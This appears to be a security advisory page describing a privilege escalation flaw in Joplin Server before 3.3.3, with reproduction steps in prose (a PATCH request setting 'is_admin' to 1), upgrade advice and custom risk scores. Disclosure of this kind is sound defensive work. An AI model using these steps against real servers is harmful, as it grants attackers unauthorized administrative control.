Primary

Context

Joplin Server Privilege Escalation Vulnerability

Vulnerability

A privilege escalation vulnerability has been identified in Joplin Server versions prior to 3.3.3. This vulnerability allows non-admin users to exploit the API endpoint 'PATCH /api/users/:id' to elevate their privileges by setting the 'is_admin' field to 1. As a result, low-privileged users can perform administrative actions without proper authorization.

Impact

Exploitation of this vulnerability allows low-privileged users to gain administrative rights and perform actions reserved for administrators.

Reproduction

To reproduce this vulnerability, log in as a non-admin user and send a PATCH request to the '/api/users/:id' endpoint, including a payload that sets the 'is_admin' field to 1. After the request is processed, the user will have administrative privileges.

Remediation

Users can update to Joplin Server version 3.3.3 or later to address this vulnerability.

Added: Sep 1, 2025, 7:22 PM

Updated: Sep 1, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

6.6

remediation

7.7

relevance

0.0

threat

6.7

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

6.6

remediation

7.7

relevance

0.0

threat

6.7

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Joplin Server Privilege Escalation Vulnerability

Vulnerability

Impact

Reproduction

Remediation

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating